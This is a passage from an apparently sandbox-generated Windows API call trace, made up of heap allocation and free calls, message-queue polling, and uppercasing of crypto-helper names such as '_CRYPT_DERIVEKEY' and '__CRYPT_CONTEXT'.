wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.221] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0169.221] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0169.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0169.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0169.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0169.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0169.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0169.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0169.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.224] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0169.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0169.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0169.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0169.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0169.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0169.225] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0169.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0169.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0169.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0169.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0169.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0169.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0169.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0169.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0169.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0169.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0169.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0169.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0169.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0169.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0169.228] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.228] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.228] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0169.228] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0169.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0169.229] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0169.229] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.229] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0169.229] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.229] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.229] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0169.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0169.230] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0169.230] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.230] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0169.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0169.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0169.231] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: 